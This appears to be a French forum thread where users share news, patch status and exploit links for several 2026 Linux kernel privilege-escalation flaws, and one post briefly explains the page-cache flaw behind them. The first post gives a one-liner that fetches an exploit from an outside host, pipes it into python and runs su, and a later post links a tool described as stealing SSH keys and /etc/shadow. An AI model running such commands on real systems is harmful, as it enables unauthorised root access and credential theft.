CVE noyau linux

Bonjour,

Faille de sécurité dans tous les linux depuis 2017 permettant un accès administrateur depuis n’importe quel compte utilisateur:

https://security-tracker.debian.org/tracker/CVE-2026-31431

$ curl https://copy.fail/exp | python3 && su

dino

6 Likes

proxmox a sortie un kernel v7 qui corrige donc la faille

1 Like

et la petite soeur GitHub - V4bel/dirtyfrag · GitHub

pas encore de CVE ni de patch

2 Likes

Et le petit dernier GitHub - 0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo: Copy Fail 2: Electric Boogaloo · GitHub

Bah c’est pas bientôt fini ? :sweat_smile: on fait un focus que je ne vois pas habituellement ou il se passe un vrai truc ?

La première faille portait sur un bypass de la modification en RAM du cache d’un fichier sur disque.
Du coup tant le que cache de ce fichier reste en RAM, c’est comme si le fichier avait été modifié pour tout le système.
Les chercheurs en sécurité doivent chercher partout dans Linux si ce défaut logique est pas présent ailleurs… Et ça a été trouvé à 2 autres endroits. Quelle angoisse ^^’

2 Likes

une nginx et une suite de frag

1 Like

Nouvel exploit ce coup ci sur les droits d’accès aux fichiers GitHub - 0xdeadbeefnetwork/ssh-keysign-pwn: Steal SSH host private keys and /etc/shadow via the ptrace_may_access mm-NULL bypass + pidfd_getfd. Pre-31e62c2ebbfd kernels. · GitHub

1 Like

Ça devient récurrent les exploits le vendredi, en espérant qu’on sera tranquille vendredi prochain.

1 Like

vous reprendrez bien une petite faille ? V12 (@v12sec): "today we are releasing a qemu escape" | XCancel

bonjour
une nouvelle
https://www.it-connect.fr/la-faille-dirtydecrypt-menace-les-serveurs-linux-un-poc-a-ete-publie/

dino

Il y en a un peu plus je vous le met quand même ? https://www.it-connect.fr/cifswitch-cette-faille-linux-presente-depuis-19-ans-offre-un-acces-root/